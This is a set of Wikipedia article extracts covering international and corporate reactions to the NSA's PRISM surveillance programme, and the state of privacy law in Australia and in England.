Carrsaid that Australians should not be concerned about PRISM but that cybersecurity is high on the government's list of concerns.[89]The Australian Foreign Minister Julie Bishop stated that the acts ofEdward Snowdenwere treachery and offered a staunch defence of her nation's intelligence co-operation with the United States.[90] Brazil's president at the time,Dilma Rousseff, responded to Snowden's reports that the NSA spied on her phone calls and emails by cancelling a planned October 2013state visitto the United States, demanding an official apology, which by October 20, 2013, hadn't come.[91]Also, Rousseff classified the spying as unacceptable between more harsh words in a speech before theUN General Assemblyon September 24, 2013.[92]As a result,Boeinglost out on a US$4.5 billion contract for fighter jets to Sweden'sSaab Group.[93] Canada's national cryptologic agency, theCommunications Security Establishment(CSE), said that commenting on PRISM "would undermine CSE's ability to carry out its mandate."Privacy CommissionerJennifer Stoddartlamented Canada's standards when it comes to protecting personal online privacy stating "We have fallen too far behind" in her report. "While other nations' data protection authorities have the legal power to make binding orders, levy hefty fines and take meaningful action in the event of serious data breaches, we are restricted to a 'soft' approach: persuasion, encouragement and, at the most, the potential to publish the names of transgressors in the public interest." And, "when push comes to shove," Stoddart wrote, "short of a costly and time-consuming court battle, we have no power to enforce our recommendations."[94][95] On 20 October 2013 a committee at theEuropean Parliamentbacked a measure that, if it is enacted, would require American companies to seek clearance from European officials before complying with United States warrants seeking private data. The legislation has been under consideration for two years. The vote is part of efforts in Europe to shield citizens from online surveillance in the wake ofrevelations about a far-reaching spying programby theU.S. National Security Agency.[96]Germany and France have also had ongoing mutual talks about how they can keep European email traffic from going across American servers.[97] On October 21, 2013, the French Foreign Minister,Laurent Fabius, summoned the U.S. Ambassador,Charles Rivkin, to theQuai d'OrsayinParisto protest large-scale spying on French citizens by the U.S. National Security Agency (NSA). Paris prosecutors had opened preliminary inquiries into the NSA program in July, but Fabius said, "... obviously we need to go further" and "we must quickly assure that these practices aren't repeated."[98] Germany did not receive any raw PRISM data, according to a Reuters report.[99]German ChancellorAngela Merkelsaid that "the internet is new to all of us" to explain the nature of the program; Matthew Schofield ofMcClatchy Washington Bureausaid, "She was roundly mocked for that statement."[100]Gert-René Polli, a former Austrian counter-terrorism official, said in 2013 that it is "absurd and unnatural" for the German authorities to pretend not to have known anything.[86][87]The German Army was using PRISM to support its operations in Afghanistan as early as 2011.[101] In October 2013, it was reported that the NSA monitored Merkel's cell phone.[102]The United States denied the report, but following the allegations, Merkel called President Obama and told him that spying on friends was "never acceptable, no matter in what situation."[103] Israeli newspaperCalcalistdiscussed[104]theBusiness Insiderarticle[105]about the possible involvement of technologies from two secretive Israeli companies in the PRISM program—Verint SystemsandNarus. After finding out about the PRISM program, the Mexican Government has started constructing its own spying program to spy on its own citizens. According to Jenaro Villamil, a writer fromProceso,CISEN, Mexico's intelligence agency has started to work withIBMandHewlett Packardto develop its own data gathering software. "Facebook, Twitter, Emails and other social network sites are going to be priority."[106] In New Zealand,University of Otagoinformation science Associate Professor Hank Wolfe said that "under what was unofficially known as theFive EyesAlliance, New Zealand and other governments, including the United States, Australia, Canada, and Britain, dealt with internal spying by saying they didn't do it. But they have all the partners doing it for them and then they share all the information."[107] Edward Snowden, in a live streamed Google Hangout toKim DotcomandJulian Assange, alleged that he had received intelligence from New Zealand, and the NSA has listening posts in New Zealand.[108] At a meeting of European Union leaders held the week of 21 October 2013,Mariano Rajoy, Spain's prime minister, said that "spying activities aren't proper among partner countries and allies". On 28 October 2013 the Spanish government summoned the American ambassador,James Costos, to address allegations that the U.S. had collected data on 60 million telephone calls in Spain. Separately,Íñigo Méndez de Vigo, a Spanish secretary of state, referred to the need to maintain "a necessary balance" between security and privacy concerns, but said that the recent allegations of spying, "if proven to be true, are improper and unacceptable between partners and friendly countries".[109] In the United Kingdom, theGovernment Communications Headquarters(GCHQ), which also has its own surveillance program,Tempora, had access to the PRISM program on or before June 2010 and wrote 197 reports with it in 2012 alone. TheIntelligence and Security Committeeof theUK Parliamentreviewed the reports GCHQ produced on the basis of intelligence sought from the US. They found in each case a warrant for interception was in place in accordance with the legal safeguards contained in UK law.[110] In August 2013,The Guardiannewspaper's offices were visited by technicians from GCHQ, who ordered and supervised the destruction of the hard drives containing information acquired from Snowden.[111] The originalWashington PostandGuardianarticles reporting on PRISM noted that one of the leaked briefing documents said PRISM involves collection of data "directly from the servers" of several major internet services providers.[1][2] Corporate executives of several companies identified in the leaked documents toldThe Guardianthat they had no knowledge of the PRISM program in particular and also denied making information available to the government on the scale alleged by news reports.[2][112]Statements of several of the companies named in the leaked documents were reported byTechCrunchandThe Washington Postas follows:[113][114] In response to the technology companies' confirmation of the NSA being able to directly access the companies' servers,The New York Timesreported that sources had stated the NSA was gathering the surveillance data from the companies using other technical means in response to court orders for specific sets of data.[17]The Washington Postsuggested, "It is possible that the conflict between the PRISM slides and the company spokesmen is the result of imprecision on the part of the NSA author. In another classified report obtained by The Post, the arrangement is described as allowing 'collection managers [to send] content tasking instructions directly to equipment installed at company-controlled locations,' rather than directly to company servers."[1]"[I]n context, 'direct' is more likely to mean that the NSA is receiving data sent to them deliberately by the tech companies, as opposed to intercepting communications as they're transmitted to some other destination.[114] "If these companies received an order under the FISA amendments act, they are forbidden by law from disclosing having received the order and disclosing any information about the order at all," Mark Rumold, staff attorney at theElectronic Frontier Foundation, toldABC News.[117] On May 28, 2013, Google was ordered by United States District Court JudgeSusan Illstonto comply with aNational Security Letterissued by the FBI to provide user data without a warrant.[118]Kurt Opsahl, a senior staff attorney at the Electronic Frontier Foundation, in an interview withVentureBeatsaid, "I certainly appreciate that Google put out atransparency report, but it appears that the transparency didn't include this. I wouldn't be surprised if they were subject to agag order."[119] The New York Timesreported on June 7, 2013, that "Twitter declined to make it easier for the government. But other companies were more compliant, according to people briefed on the negotiations."[120]The other companies held discussions with national security personnel on how to make data available more efficiently and securely.[120]In some cases, these companies made modifications to their systems in support of the intelligence collection effort.[120]The dialogues have continued in recent months, as GeneralMartin Dempsey, thechairman of the Joint Chiefs of Staff, has met with executives including those at Facebook, Microsoft, Google andIntel.[120]These details on the discussions provide insight into the disparity between initial descriptions of the government program including a training slide which states, "Collection directly from the servers"[121]and the companies' denials.[120] While providing data in response to a legitimate FISA request approved by the FISA Court is a legal requirement, modifying systems to make it easier for the government to collect the data is not. This is why Twitter could legally decline to provide an enhanced mechanism for data transmission.[120]Other than Twitter, the companies were effectively asked to construct a locked mailbox and provide the key to the government, people briefed on the negotiations said.[120]Facebook, for instance, built such a system for requesting and sharing the information.[120]Google does not provide a lockbox system, but instead transmits required data by hand delivery orssh.[122] In response to the publicity surrounding media reports of data-sharing, several companies requested permission to reveal more public information about the nature and scope of information provided in response to National Security requests. On June 14, 2013, Facebook reported that the U.S. government had authorized the communication of "about these numbers in aggregate, and as a range." In a press release posted to its web site, the company reported, "For the six months ending December 31, 2012, the total number of user-data requests Facebook received from any and all government entities in the U.S. (including local, state, and federal, and including criminal and national security-related requests) – was between 9,000 and 10,000." The company further reported that the requests impacted "between 18,000 and 19,000" user accounts, a "tiny fraction of one percent" of more than 1.1 billion active user accounts.[123] That same day, Microsoft reported that for the same period, it received "between 6,000 and 7,000 criminal and national security warrants, subpoenas and orders affecting between 31,000 and 32,000 consumer accounts from U.S. governmental entities (including local, state and federal)" which impacted "a tiny fraction of Microsoft's global customer base."[124] Google issued a statement criticizing the requirement that data be reported in aggregated form, stating that lumping national security requests with criminal request data would be "a step backwards" from its previous, more detailed practices on its website'stransparency report. The company said that it would continue to seek government permission to publish the number and extent of FISA requests.[125] Cisco Systemssaw a huge drop in export sales because of fears that the National Security Agency could be using backdoors in its products.[126] On September 12, 2014, Yahoo! reported the U.S. Government threatened the imposition of $250,000 in fines per day if Yahoo didn't hand over user data as part of the NSA's PRISM program.[127]It is not known if other companies were threatened or fined for not providing data in response to a legitimate FISA requests. The New York Timeseditorial board charged that the Obama administration "has now lost all credibility on this issue,"[128]and lamented that "for years, members of Congress ignored evidence that domestic intelligence-gathering had grown beyond their control, and, even now, few seem disturbed to learn that every detail about the public's calling and texting habits now reside in a N.S.A. database."[129]It wrote with respect to theFISA-Courtin context of PRISM that it is "a perversion of the American justice system" when "judicial secrecy is coupled with a one-sided presentation of the issues."[130]According to the New York Times, "the result is a court whose reach is expanding far beyond its original mandate and without any substantive check."[130] James Robertson, a former federal district judge based in Washington who served on the secret Foreign Intelligence Surveillance Act court for three years between 2002 and 2005 and who ruled against the Bush administration in the landmarkHamdan v. Rumsfeldcase, said FISA court is independent but flawed because only the government's side is represented effectively in its deliberations. "Anyone who has been a judge will tell you a judge needs to hear both sides of a case," said James Robertson.[131]Without this judges do not benefit from adversarial debate. He suggested creating an advocate with security clearance who would argue against government filings.[132]Robertson questioned whether the secret FISA court should provide overall legal approval for the surveillance programs, saying the court "has turned into something like an administrative agency." Under the changes brought by theForeign Intelligence Surveillance Act of 1978 Amendments Act of 2008, which expanded the US government's authority by forcing the court to approve entire surveillance systems and not just surveillance warrants as it previously handled, "the court is now approving programmatic surveillance. I don't think that is a judicial function."[131]Robertson also said he was "frankly stunned" by the New York Times report[80]that FISA court rulings had created a new body of law broadening the ability of the NSA to use its surveillance programs to target not only terrorists but suspects in cases involving espionage, cyberattacks and weapons of mass destruction.[131] FormerCIAanalystValerie Plame Wilsonand former U.S. diplomatJoseph Wilson, writing in anop-edarticle published inThe Guardian, said that "Prism and other NSA data-mining programs might indeed be very effective in hunting and capturing actual terrorists, but we don't have enough information as a society to make that decision."[133] TheElectronic Frontier Foundation(EFF), an international non-profitdigital-rightsgroup based in the U.S., is hosting a tool, by which an American resident can write to their government representatives regarding their opposition to mass spying.[134] The Obama administration's argument that NSA surveillance programs such as PRISM andBoundless Informanthad been necessary to prevent acts of terrorism was challenged by several parties. Ed Pilkington and Nicholas Watt ofThe Guardiansaid of the case ofNajibullah Zazi, who had planned to bomb theNew York City Subway, that interviews with involved parties and U.S. and British court documents indicated that the investigation into the case had actually been initiated in response to "conventional" surveillance methods such as "old-fashioned tip-offs" of the British intelligence services, rather than to leads produced by NSA surveillance.[135]Michael Daly ofThe Daily Beaststated that even thoughTamerlan Tsarnaev, who conducted theBoston Marathon bombingwith his brotherDzhokhar Tsarnaev, had visited theAl Qaeda-affiliatedInspiremagazine website, and even though Russian intelligence officials had raised concerns with U.S. intelligence officials about Tamerlan Tsarnaev, PRISM did not prevent him from carrying out the Boston attacks. Daly observed that, "The problem is not just what the National Security Agency is gathering at the risk of our privacy but what it is apparently unable to monitor at the risk of our safety."[136] Ron Paul, a former Republican member of Congress and prominentlibertarian, thanked Snowden and Greenwald and denounced the mass surveillance as unhelpful and damaging, urging instead more transparency in U.S. government actions.[137]He called Congress "derelict in giving that much power to the government," and said that had he been elected president, he would have ordered searches only when there wasprobable causeof a crime having been committed, which he said was not how the PRISM program was being operated.[138] New York TimescolumnistThomas L. Friedmandefended limited government surveillance programs intended to protect the American people from terrorist acts: Yes, I worry about potential government abuse of privacy from a program designed to prevent another 9/11—abuse that, so far, does not appear to have happened. But I worry even more about another 9/11. ... If there were another 9/11, I fear that 99 percent of Americans would tell their members of Congress: "Do whatever you need to do to, privacy be damned, just make sure this does not happen again."Thatis what I fear most. That is why I'll reluctantly, very reluctantly, trade off the government using data mining to look for suspicious patterns in phone numbers called and e-mail addresses—and then have to go to a judge to get a warrant to actually look at the content under guidelines set by Congress—to prevent a day where, out of fear, we give government a license to look at anyone, any e-mail, any phone call, anywhere, anytime.[139] Political commentatorDavid Brookssimilarly cautioned that government data surveillance programs are a necessary evil: "if you don't have mass data sweeps, well, then these agencies are going to want to go back to the old-fashioned eavesdropping, which is a lot more intrusive."[140] Conservative commentatorCharles Krauthammerworried less about the legality of PRISM and other NSA surveillance tools than about the potential for their abuse without more stringent oversight. "The problem here is not constitutionality. ... We need a toughening of both congressional oversight and judicial review, perhaps even some independent outside scrutiny. Plus periodic legislative revision—say, reauthorization every couple of years—in light of the efficacy of the safeguards and the nature of the external threat. The object is not to abolish these vital programs. It's to fix them."[141] In a blog post,David Simon, the creator ofThe Wire, compared the NSA's programs, including PRISM, to a 1980s effort by the City of Baltimore to add dialed number recorders to all pay phones to know which individuals were being called by the callers;[142]the city believed that drug traffickers were using pay phones and pagers, and a municipal judge allowed the city to place the recorders. The placement of the dialers formed the basis of the show's first season. Simon argued that the media attention regarding the NSA programs is a "faux scandal."[142][143]Simon had stated that many classes of people in American society had already faced constant government surveillance. Political activist, and frequent critic of U.S. government policies,Noam Chomskyargued, "Governments should not have this capacity. But governments will use whatever technology is available to them to combat their primary enemy – which is their own population."[144] ACNN/Opinion Research Corporationpoll conducted June 11 through 13 and released in 2013 found that 66% of Americans generally supported the program.[145][146][Notes 1]However, a Quinnipiac University poll conducted June 28 through July 8 and released in 2013 found that 45% of registered voters think the surveillance programs have gone too far, with 40% saying they do not go far enough, compared to 25% saying they had gone too far and 63% saying not far enough in 2010.[147]Other polls have shown similar shifts in public opinion as revelations about the programs were leaked.[148][149] In terms of economic impact, a study released in August by theInformation Technology and Innovation Foundation[150]found that the disclosure of PRISM could cost the U.S. economy between $21.5 and $35 billion in lost cloud computing business over three years.[151][152][153][154] Sentiment around the world was that of general displeasure upon learning the extent of world communication data mining. Some national leaders spoke against the NSA and some spoke against their own national surveillance. One national minister had scathing comments on the National Security Agency's data-mining program, citing Benjamin Franklin: "The more a society monitors, controls, and observes its citizens, the less free it is."[155]Some question if the costs of hunting terrorists now overshadows the loss of citizen privacy.[156][157] Nick Xenophon, an Australian independent senator, askedBob Carr, theAustralian Minister of Foreign Affairs, if e-mail addresses of Australian parliamentarians were exempt from PRISM, Mainway, Marina, and/or Nucleon. After Carr replied that there was a legal framework to protect Australians but that the government would not comment on intelligence matters, Xenophon argued that this was not a specific answer to his question.[158] Talibanspokesperson Zabiullah Mujahid said, "We knew about their past efforts to trace our system. We have used our technical resources to foil their efforts and have been able to stop them from succeeding so far."[159][160]However CNN has reported that terrorist groups have changed their "communications behaviors" in response to the leaks.[65] In 2013 theCloud Security Alliancesurveyedcloud computingstakeholders about their reactions to the US PRISM spying scandal. About 10% of non-US residents indicated that they had cancelled a project with a US-based cloud computing provider, in the wake of PRISM; 56% said that they would be less likely to use a US-based cloud computing service. The Alliance predicted that US cloud computing providers might lose as much as €26 billion and 20% of its share of cloud services in foreign markets because of the PRISM spying scandal.[161] Reactions of internet users in China were mixed between viewing a loss of freedom worldwide and seeing state surveillance coming out of secrecy. The story broke just before U.S. PresidentBarack Obamaand Chinese PresidentXi Jinpingmet in California.[162][163]When asked about NSA hacking China, the spokeswoman ofMinistry of Foreign Affairs of the People's Republic of Chinasaid, "China strongly advocates cybersecurity."[164]The party-owned newspaperLiberation Dailydescribed this surveillance likeNineteen Eighty-Four-style.[165]Hong Kong legislatorsGary FanandClaudia Mowrote a letter to Obama stating, "the revelations of blanket surveillance of global communications by the world's leading democracy have damaged the image of the U.S. among freedom-loving peoples around the world."[166]Ai Weiwei, a Chinese dissident, said, "Even though we know governments do all kinds of things I was shocked by the information about the US surveillance operation, Prism. To me, it's abusively using government powers to interfere in individuals' privacy. This is an important moment for international society to reconsider and protect individual rights."[167] Sophie in 't Veld, a DutchMember of the European Parliament, called PRISM "a violation of EU laws."[168] The GermanFederal Commissioner for Data Protection and Freedom of Information, Peter Schaar, condemned the program as "monstrous."[169]He further added that White House claims do "not reassure me at all" and that "given the large number of German users of Google, Facebook, Apple or Microsoft services, I expect the German government ... is committed to clarification and limitation of surveillance."Steffen Seibert, press secretary of the Chancellor's office, announced thatAngela Merkelwill put these issues on the agenda of the talks withBarack Obamaduring his pending visit in Berlin.[170]Wolfgang Schmidt, a former lieutenant colonel with theStasi, said that the Stasi would have seen such a program as a "dream come true" since the Stasi lacked the technology that made PRISM possible.[171]Schmidt expressed opposition, saying, "It is the height of naivete to think that once collected this information won't be used. This is the nature of secret government organizations. The only way to protect the people's privacy is not to allow the government to collect their information in the first place."[100]Many Germans organized protests, including one atCheckpoint Charlie, when Obama went to Berlin to speak. Matthew Schofield of theMcClatchy Washington Bureausaid, "Germans are dismayed at Obama's role in allowing the collection of so much information."[100] The Italian president of the Guarantor for the protection of personal data, Antonello Soro, said that the surveillance dragnet "would not be legal in Italy" and would be "contrary to the principles of our legislation and would represent a very serious violation."[172] CNIL(French data protection watchdog) ordered Google to change its privacy policies within three months or risk fines up to 150,000 euros.Spanish Agency of data protection(AEPD) planned to fine Google between 40,000 and 300,000 euros if it failed to clear stored data on the Spanish users.[173] William Hague, theforeign secretaryof the United Kingdom, dismissed accusations that British security agencies had been circumventing British law by using information gathered on British citizens by PRISM[174]saying, "Any data obtained by us from the United States involving UK nationals is subject to proper UK statutory controls and safeguards."[174]David Cameronsaid Britain's spy agencies that received data collected from PRISM acted within the law: "I'm satisfied that we have intelligence agencies that do a fantastically important job for this country to keep us safe, and they operate within the law."[174][175]Malcolm Rifkind, the chairman of parliament'sIntelligence and Security Committee, said that if the British intelligence agencies were seeking to know the content of emails about people living in the UK, then they actually have to get lawful authority.[175]The UK'sInformation Commissioner's Officewas more cautious, saying it would investigate PRISM alongside other European data agencies: "There are real issues about the extent to which U.S. law agencies can access personal data of UK and other European citizens. Aspects of U.S. law under which companies can be compelled to provide information to U.S. agencies potentially conflict withEuropean data protection law, including the UK's ownData Protection Act. The ICO has raised this with its European counterparts, and the issue is being considered by theEuropean Commission, who are in discussions with the U.S. Government."[168] Tim Berners-Lee, the inventor of theWorld Wide Web, accused western governments of practicing hypocrisy, as they conducted spying on the internet while they criticized other countries for spying on the internet. He stated that internet spying can make people feel reluctant to access intimate and private information that is important to them.[176]In a statement given toFinancial Timesfollowing the Snowden revelations, Berners-Lee stated "Unwarranted government surveillance is an intrusion on basic human rights that threatens the very foundations of a democratic society."[177] Minister of External AffairsSalman Khurshiddefended the PRISM program saying, "This is not scrutiny and access to actual messages. It is only computer analysis of patterns of calls and emails that are being sent. It is not actually snooping specifically on content of anybody's message or conversation. Some of the information they got out of their scrutiny, they were able to use it to prevent serious terrorist attacks in several countries."[178]His comments contradicted hisForeign Ministry'scharacterization of violations of privacy as "unacceptable."[179][180]When the thenMinister of Communications and Information TechnologyKapil Sibalwas asked about Khurshid's comments, he refused to comment on them directly, but said, "We do not know the nature of data or information sought [as part of PRISM]. Even theexternal ministrydoes not have any idea."[181]The media felt that Khurshid's defence of PRISM was because the India government was rolling out theCentral Monitoring System(CMS), which is similar to the PRISM program.[182][183][184] Khurshid's comments were criticized by the Indian media,[185][186]as well as opposition partyCPI(M)who stated, "TheUPAgovernment should have strongly protested against such surveillance and bugging. Instead, it is shocking that Khurshid has sought to justify it. This shameful remark has come at a time when even the close allies of the US like Germany and France have protested against the snooping on their countries."[187] Rajya SabhaMPP. Rajeev toldThe Times of Indiathat "The act of the USA is a clear violation ofVienna convention on diplomatic relations. But Khurshid is trying to justify it. And the speed of thegovernment of Indiato reject the asylum application of Edward Snowden is shameful."[188] On June 8, 2013, theDirector of National Intelligenceissued a fact sheet stating that PRISM "is not an undisclosed collection or data mining program," but rather "an internal government computer system" used to facilitate the collection of foreign intelligence information "under court supervision, as authorized by Section 702 of theForeign Intelligence Surveillance Act(FISA) (50 U.S.C. § 1881a)."[55]Section 702 provides that "theAttorney Generaland the Director of National Intelligence may authorize jointly, for a period of up to 1 year from the effective date of the authorization, the targeting of persons reasonably believed to be located outside the United States to acquire foreign intelligence information."[189]In order to authorize the targeting, the attorney general and Director of National Intelligence need to obtain an order from theForeign Intelligence Surveillance Court(FISA Court) pursuant to Section 702 or certify that "intelligence important to the national security of the United States may be lost or not timely acquired and time does not permit the issuance of an order."[189]When requesting an order, the attorney general and Director of National Intelligence must certify to the FISA Court that "a significant purpose of the acquisition is to obtain foreign intelligence information."[189]They do not need to specify which facilities or property will be targeted.[189] After receiving a FISA Court order or determining that there are emergency circumstances, the attorney general and Director of National Intelligence can direct an electronic communication service provider to give them access to information or facilities to carry out the targeting and keep the targeting secret.[189]The provider then has the option to: (1) comply with the directive; (2) reject it; or (3) challenge it with the FISA Court. If the provider complies with the directive, it is released from liability to its users for providing the information and is reimbursed for the cost of providing it,[189]while if the provider rejects the directive, the attorney general may request an order from the FISA Court to enforce it.[189]A provider that fails to comply with the FISA Court's order can be punished withcontempt of court.[189] Finally, a provider can petition the FISA Court to reject the directive.[189]In case the FISA Court denies the petition and orders the provider to comply with the directive, the provider risks contempt of court if it refuses to comply with the FISA Court's order.[189]The provider can appeal the FISA Court's denial to theForeign Intelligence Surveillance Court of Reviewand then appeal the Court of Review's decision to theSupreme Courtby awrit of certiorarifor reviewunder seal.[189] The Senate Select Committee on Intelligence and the FISA Courts had been put in place to oversee intelligence operations in the period after the death ofJ. Edgar Hoover. Beverly Gage ofSlatesaid, "When they were created, these new mechanisms were supposed to stop the kinds of abuses that men like Hoover had engineered. Instead, it now looks as if they have come to function asrubber stampsfor the expansive ambitions of the intelligence community. J. Edgar Hoover no longer rules Washington, but it turns out we didn't need him anyway."[190] In November 2017, the district court dismissed the case. Laura Donohue, a law professor at theGeorgetown University Law Centerand itsCenter on National Security and the Law, has called PRISM and other NSA mass surveillance programs unconstitutional.[194] Woodrow Hartzog, an affiliate atStanford Law School'sCenter for Internet and Societycommented that "[The ACLU will] likely have to demonstrate legitimate First Amendment harms (such aschilling effects) or Fourth Amendment harms (perhaps a violation of a reasonable expectation of privacy) ... Is it a harm to merely know with certainty that you are being monitored by the government? There's certainly an argument that it is. People under surveillance act differently, experience a loss of autonomy, are less likely to engage in self exploration and reflection, and are less willing to engage in core expressive political activities such as dissenting speech and government criticism. Such interests are what First and Fourth Amendment seek to protect."[195] TheFISA Amendments Act(FAA) Section 702 is referenced in PRISM documents detailing the electronic interception, capture and analysis ofmetadata. Many reports and letters of concern written by members of Congress suggest that this section of FAA in particular is legally and constitutionally problematic, such as by targeting U.S. persons, insofar as "Collections occur in U.S." as published documents indicate.[196][197][198][199] The ACLU has asserted the following regarding the FAA: "Regardless of abuses, the problem with the FAA is more fundamental: the statute itself is unconstitutional."[200] SenatorRand Paulis introducing new legislation called the Fourth Amendment Restoration Act of 2013 to stop the NSA or other agencies of the United States government from violating theFourth Amendmentto theU.S. Constitutionusing technology andbig datainformation systems like PRISM and Boundless Informant.[201][202] Besides the information collection program started in 2007, there are two other programs sharing the name PRISM:[203] Parallel programs, known collectively asSIGADsgather data andmetadatafrom other sources, each SIGAD has a set of defined sources, targets, types of data collected, legal authorities, and software associated with it. Some SIGADs have the same name as the umbrella under which they sit, BLARNEY's (the SIGAD) summary, set down in the slides alongside a cartoon insignia of a shamrock and a leprechaun hat, describes it as "an ongoing collection program that leverages IC [intelligence community] and commercial partnerships to gain access and exploit foreign intelligence obtained from global networks." Some SIGADs, like PRISM, collect data at theISPlevel, but others take it from the top-level infrastructure. This type of collection is known as "upstream". Upstream collection includes programs known by the blanket termsBLARNEY, FAIRVIEW,OAKSTARandSTORMBREW, under each of these are individualSIGADs. Data that is integrated into a SIGAD can be gathered in other ways besides upstream, and from the service providers, for instance it can be collected from passive sensors around embassies, or even stolen from an individual computer network in a hacking attack.[205][206][207][208][209]Not all SIGADs involve upstream collection, for instance, data could be taken directly from a service provider, either by agreement (as is the case with PRISM), by means of hacking, or other ways.[210][211][212]According tothe Washington Post, the much less knownMUSCULARprogram, which directly taps the unencrypted data inside the Google and Yahooprivate clouds, collects more than twice as many data points compared to PRISM.[213]Because the Google and Yahoo clouds span the globe, and because the tap was done outside of the United States, unlike PRISM, the MUSCULAR program requires no (FISA or other type of)warrants.[214]
https://en.wikipedia.org/wiki/PRISM_surveillance_program
There is no absolute right toprivacy in Australian lawand there is no clearly recognisedtortofinvasion of privacyor similar remedy available to people who feel their privacy has been violated. Privacy is, however, affected and protected in limited ways bycommon lawin Australia and a range offederal,state and territoriallaws, as well as administrative arrangements.[1] There is nostatutorydefinition of privacy in Australia.[1]TheAustralian Law Reform Commission(ALRC) was given a reference to review Australian privacy law in 2006. During that review it considered the definition of privacy in 2007 in its Discussion paper 72.[2]In it, the ALRC found there is no "precise definition of universal application" of privacy; instead it conducted the inquiry considering the contextual use of the term "privacy".[2]: para 1.37–1.45 In reaching that conclusion, the ALRC began by considering theconceptof privacy:[2]: para 1.29 It is unclear if atortof invasion of privacy exists under Australian law.[4]The ALRC summarised the position in 2007:[2]: para 5.12, 5.14 "In Australia, no jurisdiction has enshrined in legislation a cause of action for invasion of privacy; however, the door to the development of such a cause of action at common law has been left open by the High Court inAustralian Broadcasting Corporation v Lenah Game Meats Pty Ltd(Lenah Game Meats).[5]To date, two lower courts have held that such a cause of action is part of the common law of Australia. ..." "At common law, the major obstacle to the recognition in Australia of a right to privacy was, before 2001, the 1937 High Court decision inVictoria Park Racing & Recreation Grounds Co Ltd v Taylor(Victoria Park).[6]In a subsequent decision, the High Court inLenah Game Meatsindicated clearly that the decision inVictoria Park'does not stand in the path of the development of … a cause of action (for invasion of privacy)'. The elements of such a cause of action – and whether the cause of action is to be left to the common law tradition of incremental development or provided for in legislation – remain open questions." However, in 2008, the Court of Appeal of theSupreme Court of Victoriaheld "damages should be available for breach of confidence occasioning distress, either as equitable compensation, or underLord Cairns' Act."[7]This is a reference to theequitabledoctrineofbreach of confidence, which is different from a tort of invasion of privacy, although it has some applications to situations where one's privacy has been invaded.[8][9] In 2013,Attorney-General of AustraliaMark DreyfusQC MP again referred the issue of privacy to the ALRC. Its terms of reference included a detailed legal design of a statutory cause of action for serious invasions of privacy, and to consider the appropriateness of any other legal remedies to redress for serious invasions of privacy. The final report,Serious Invasions of Privacy in the Digital Era (ALRC Report 123), was tabled in September 2014, after there had been a change of government. There has not been a formal response from the Australian government. Since at least the 19th century, it has been the practice to enclose mail in an envelope to prevent infringement of confidentiality. The unauthorised interception of mail of another is a criminal offence.[10] An Attorney-General discussion paper notes: On 26 March 2015 both Houses of Parliament passed theTelecommunications (Interception and Access) Amendment (Data Retention) Act 2015, which received royal assent on 13 April 2015.[12] The Act implements recommendations of theParliamentary Joint Committee on Intelligence and Security(PJCIS)Report of the Inquiry into Potential Reforms of Australia’s National Security Legislationby amending theTelecommunications (Interception and Access) Act 1979to:
https://en.wikipedia.org/wiki/Privacy_in_Australian_law
Privacy in English lawis a rapidly developing area ofEnglish lawthat considers situations where individuals have alegal righttoinformational privacy- the protection of personal or private information from misuse or unauthorized disclosure.[1]Privacy law is distinct from those laws such astrespassorassaultthat are designed to protect physical privacy. Such laws are generally considered as part ofcriminal lawor thelaw of tort. Historically, Englishcommon lawhas recognized no general right ortortof privacy, and offered only limited protection through the doctrine ofbreach of confidenceand a "piecemeal" collection of related legislation on topics likeharassmentanddata protection. The introduction of theHuman Rights Act 1998incorporated into English law theEuropean Convention on Human Rights. Article 8.1 of the ECHR provided an explicit right to respect for a private life. The Convention also requires the judiciary to "have regard" to the Convention in developing the common law.[2] The earliest definition of privacy in English law was given byThomas M. Cooleywho defined privacy as "the right to be left alone".[3]In 1972 the Younger Committee, an inquiry into privacy stated that the term could not be defined satisfactorily. Again in 1990 theCalcutt Committeeconcluded that: "nowhere have we found a wholly satisfactory statutory definition of privacy".[3] There is currently aright to privacyincommon law.[4]This point was reaffirmed when the House of Lords ruled inCampbell v MGN(a case involving a supermodel who claimed that she had not taken drugs).[5][failed verification]It has also been stated that the European Convention on Human Rights does not require the development of an independent tort of privacy.[2]In the absence of a common law right to privacy in English law torts such as the equitable doctrine breach of confidence,[6]torts linked to the intentional infliction of harm to the person[7]and public law torts relating to the use of police powers[8]have been used to fill a gap in the law. The judiciary has developed the law in an incremental fashion and have resisted the opportunity to create a new tort.[9] British Radio JockeySara Cox's case againstThe Peoplenewspaper in 2003 was one of the firstcelebrity privacycases. The media referred to the case as a "watershed". The disc jockey sued after the newspaper printed nude photographs of her taken while on her honeymoon. However the case was settled out of court and so did not establish a precedent.[10]The decision was seen as discrediting thePress Complaints Commission[11] The expansion of the doctrine of breach of confidence under theHuman Rights Actbegan with theDouglas v Hello!decision in 2005. Section 6 of the Human Rights Act requires English courts to give effect to the rights in the Convention when developing the common law. There is no need to show a pre-existing relationship of confidence where private information is involved and the courts have recognised that the publication of private material represents a detriment in itself.[2]The Human Rights act hashorizontal effectin disputes between private individuals meaning that the Human Rights Act is just as applicable as if one party had been a public body.[12]Breach of confidence now extends to private information (regardless of whether it is confidential) so as to give effect to Article 8 of the European Convention on Human Rights. Before this breach of confidence afforded "umbrella protection" to both personal and non-personal information.[1] FollowingMax Mosley's successful action in 2008 against theNews of the Worldnewspaper for publishing details of his private life, he announced that he would challenge English law's implementation of the Article 8 right to privacy guaranteed when the Human Rights Act implemented the European Convention on Human Rights into English law.[13]The European Court of Human Rights (ECHR) was asked to rule on the issue of "prior notification". This would require journalists to approach the subject of any investigation and inform them of the details of any allegations made about them, therefore allowing an injunction to be claimed.[13]The ECHR ruled that domestic law was not in conflict with the convention.[14] The increasing protections afforded to the private lives of individuals has sparked debate as to whetherEnglish lawgives enough weight to freedom of the press and whether intervention byParliamentwould be beneficial. The editor of the satirical magazinePrivate EyeIan Hislophas argued against the development of English privacy law. He told BBC'sPanorama: "You don't have to prove it [an allegation] isn't true, you just have to prove that it's private by your definition. And in some of the cases the definition of privacy is pretty weak."[15]However,Liberal DemocratpoliticianMark Oatenhas stated that the press were right to expose details of his private life:
https://en.wikipedia.org/wiki/Privacy_in_English_law
